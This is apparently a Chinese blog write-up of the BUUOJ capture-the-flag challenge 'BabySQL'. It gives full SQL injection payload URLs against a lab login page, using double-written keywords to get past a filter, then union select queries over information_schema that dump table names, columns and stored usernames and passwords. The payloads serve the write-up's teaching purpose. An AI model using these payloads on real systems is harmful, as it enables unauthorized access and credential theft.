[极客大挑战 2019]BabySQL

于 2024-07-22 10:19:58 发布
阅读量419 收藏 3
点赞数 4
文章标签: 数据库 sql 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49267515/article/details/140602516
版权

打开靶机后

试试万能方式

用户名填:1’ or 1=1 #

密码填:123

竟然不行

试一下order by

看起来or 和 by被过滤了

试一下双写,回到万能密码,用户名换为1’ oorr 1=1 #

Ok,确定是过滤了,使用order by 确定下查询了几个列

http://61baf486-f73b-4a71-a2d1-86d745d5fe64.node5.buuoj.cn:81/check.php?username=admin%27+oorrder+bbyy+3+%23&password=123

http://61baf486-f73b-4a71-a2d1-86d745d5fe64.node5.buuoj.cn:81/check.php?username=admin%27+oorrder+bbyy+4+%23&password=123

第一个链接

第二个链接

确定查询了3个列

使用union select

http://61baf486-f73b-4a71-a2d1-86d745d5fe64.node5.buuoj.cn/check.php?username=1%27+union +select+1,2,3+%23&password=123

看来union和select都被过滤了,使用双写

http://61baf486-f73b-4a71-a2d1-86d745d5fe64.node5.buuoj.cn/check.php?username=1%27+ununionion +selselectect+1,2,3+%23&password=123

Ok,开始查看有哪些table

http://61baf486-f73b-4a71-a2d1-86d745d5fe64.node5.buuoj.cn/check.php?username=1%27+ununionion +selselectect+1,2,group_concat(table_name)+frofromm+infoorrmation_schema.tables+whwhereere+table_schema=database()+%23&password=123

查看b4bsql表里有哪些column

http://61baf486-f73b-4a71-a2d1-86d745d5fe64.node5.buuoj.cn/check.php?username=1%27+ununionion%20+selselectect+1,2,group_concat(column_name)+frofromm+infoorrmation_schema.columns+whwhereere+table_name=%27b4bsql%27+%23&password=123

查询表里的所有username和passoword,注意or被过滤

http://61baf486-f73b-4a71-a2d1-86d745d5fe64.node5.buuoj.cn/check.php?username=1%27+ununionion%20+selselectect+1,group_concat(username),group_concat(passwoorrd)+frofromm+ b4bsql+%23&password=123

得到flag

Akashic以太
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值